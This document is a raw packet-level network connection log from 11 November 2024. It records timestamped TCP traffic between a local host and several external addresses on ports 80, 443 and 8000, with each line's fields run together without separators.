                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669455051 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669537067 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669605017 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669614077 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669617891 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669646978 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669846058 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669882059 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669898033 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.734041929 CET5691180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.738941908 CET8056911188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.760523081 CET5691580192.168.2.9103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.766207933 CET8056915103.150.10.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.043391943 CET8056915103.150.10.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.043672085 CET5691580192.168.2.9103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.129179955 CET569238000192.168.2.9106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.134699106 CET800056923106.15.232.163192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.190869093 CET8056911188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.190951109 CET5691180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.198074102 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.198110104 CET44355002188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.198260069 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.198561907 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.198574066 CET44355002188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.397111893 CET800056923106.15.232.163192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.397335052 CET569238000192.168.2.9106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.470715046 CET5691580192.168.2.9103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.476243019 CET8056915103.150.10.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.654270887 CET44355002188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.654381037 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.656966925 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.656976938 CET44355002188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.657232046 CET44355002188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.657279015 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.657692909 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.699333906 CET44355002188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.776349068 CET8056915103.150.10.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.776407957 CET5691580192.168.2.9103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.778120995 CET569238000192.168.2.9106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.783221006 CET800056923106.15.232.163192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:06.049734116 CET800056923106.15.232.163192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:06.049818993 CET569238000192.168.2.9106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015480042 CET44355002188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015531063 CET44355002188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015569925 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015578032 CET44355002188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015599966 CET44355002188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015608072 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015628099 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015664101 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015664101 CET44355002188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015674114 CET44355002188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015712976 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015722036 CET44355002188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015758991 CET44355002188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015779972 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015785933 CET44355002188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015799046 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015837908 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015841961 CET44355002188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.015948057 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.016066074 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.016103029 CET44355002188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.016165972 CET55002443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.054352045 CET5691180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.059412003 CET8056911188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.387156010 CET8056911188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.387221098 CET5691180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.391839027 CET55020443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.391892910 CET44355020188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.391959906 CET55020443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.392273903 CET55020443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.392292976 CET44355020188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.866386890 CET44355020188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.866470098 CET55020443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.868206978 CET55020443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.868217945 CET44355020188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.868473053 CET44355020188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.868540049 CET55020443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.868904114 CET55020443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.915333986 CET44355020188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.279093027 CET44355020188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.279135942 CET44355020188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.279158115 CET44355020188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.279166937 CET55020443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.279187918 CET44355020188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.279201984 CET55020443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.279226065 CET44355020188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.279251099 CET55020443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.279257059 CET44355020188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.279277086 CET55020443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.279315948 CET55020443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.279731035 CET55020443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.279757977 CET44355020188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.279932976 CET44355020188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.279956102 CET55020443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.279992104 CET55020443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.333268881 CET5503280192.168.2.9103.224.212.210
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.338087082 CET8055032103.224.212.210192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.339113951 CET5503280192.168.2.9103.224.212.210
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.343974113 CET5503280192.168.2.9103.224.212.210
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.348809958 CET8055032103.224.212.210192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.393544912 CET5696680192.168.2.9154.85.183.50
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.396564960 CET5503380192.168.2.9103.224.182.252
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.399226904 CET8056966154.85.183.50192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.401456118 CET8055033103.224.182.252192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.401562929 CET5503380192.168.2.9103.224.182.252
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.401809931 CET5503380192.168.2.9103.224.182.252
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.407022953 CET8055033103.224.182.252192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.679491043 CET8056966154.85.183.50192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.679569960 CET5696680192.168.2.9154.85.183.50
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.680655003 CET5696680192.168.2.9154.85.183.50
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.686279058 CET8056966154.85.183.50192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.918761015 CET8055032103.224.212.210192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.918822050 CET5503280192.168.2.9103.224.212.210
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.924417019 CET5503280192.168.2.9103.224.212.210
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.924669981 CET5697780192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.924948931 CET5503480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.929498911 CET8056977199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.929754019 CET8055034199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.929853916 CET5503480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.929888964 CET8055032103.224.212.210192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.929949999 CET5503280192.168.2.9103.224.212.210
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.930073023 CET5503480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.934838057 CET8055034199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.966717005 CET8056966154.85.183.50192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.966779947 CET5696680192.168.2.9154.85.183.50
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.967828035 CET8055033103.224.182.252192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.967881918 CET5503380192.168.2.9103.224.182.252
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.969620943 CET5503380192.168.2.9103.224.182.252
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.974817038 CET8055033103.224.182.252192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.974886894 CET5503380192.168.2.9103.224.182.252
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.987658024 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.987962961 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.992810011 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.992872000 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.992940903 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.993298054 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.998339891 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.330039024 CET8054955199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.330097914 CET5495580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.355655909 CET8055034199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.355678082 CET8055034199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.355739117 CET5503480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636183977 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636204004 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636235952 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636245966 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636261940 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636269093 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636276007 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636280060 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636291027 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636305094 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636307001 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636323929 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636328936 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636337996 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636353970 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636373043 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636388063 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636410952 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.641261101 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.641324997 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.641352892 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.641370058 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.641727924 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.641778946 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.724939108 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.724957943 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.724972010 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.724983931 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.724997997 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.725013018 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.725043058 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.725384951 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.725399017 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.725415945 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.725438118 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.725467920 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.725469112 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.725481987 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.725528002 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.332504988 CET6221280192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.337332964 CET806221272.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.337443113 CET6221280192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.341985941 CET6221280192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.347038031 CET806221272.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.832290888 CET806221272.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.832464933 CET6221280192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.832464933 CET6221280192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.833688974 CET6221380192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.837320089 CET806221272.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.839358091 CET806221372.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.839435101 CET6221380192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.839596033 CET6221380192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.844500065 CET806221372.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.332977057 CET806221372.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.333786011 CET6221380192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.344777107 CET6221580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.345657110 CET6221380192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.349791050 CET806221523.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.349855900 CET6221580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:12.350610018 CET806221372.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.725879908 CET805503564.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.725934029 CET5503580192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.595519066 CET6236680192.168.2.9178.162.203.211
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.600548983 CET8062366178.162.203.211192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.600610971 CET6236680192.168.2.9178.162.203.211
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.600913048 CET6236680192.168.2.9178.162.203.211
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.605890036 CET8062366178.162.203.211192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.662741899 CET6236780192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.666989088 CET6236880192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.668873072 CET8062367188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.670043945 CET6236780192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.673959017 CET806236844.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.674048901 CET6236880192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.946717024 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.951559067 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.951710939 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.251338959 CET6237180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.252578020 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.257103920 CET8062371188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.257181883 CET6237180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.257365942 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358485937 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358522892 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358541012 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358550072 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358551979 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358556986 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358577967 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358627081 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358629942 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358644962 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358655930 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358671904 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358700037 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358722925 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358766079 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.361793995 CET8055034199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.361854076 CET5503480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.364382029 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.364444017 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.364453077 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.364501953 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440087080 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440104008 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440116882 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440150976 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440174103 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440502882 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440530062 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440548897 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440558910 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440567017 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440573931 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440594912 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440606117 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440610886 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440623999 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440627098 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440648079 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.440675974 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.441385984 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.441400051 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.441411972 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.441468000 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.441468000 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.441761971 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.441776991 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.441788912 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.441823959 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.441855907 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.441899061 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.441912889 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.441956997 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.442625046 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.442639112 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.442651033 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.442678928 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.442719936 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.442859888 CET8062370199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.444032907 CET6237080192.168.2.9199.191.50.83
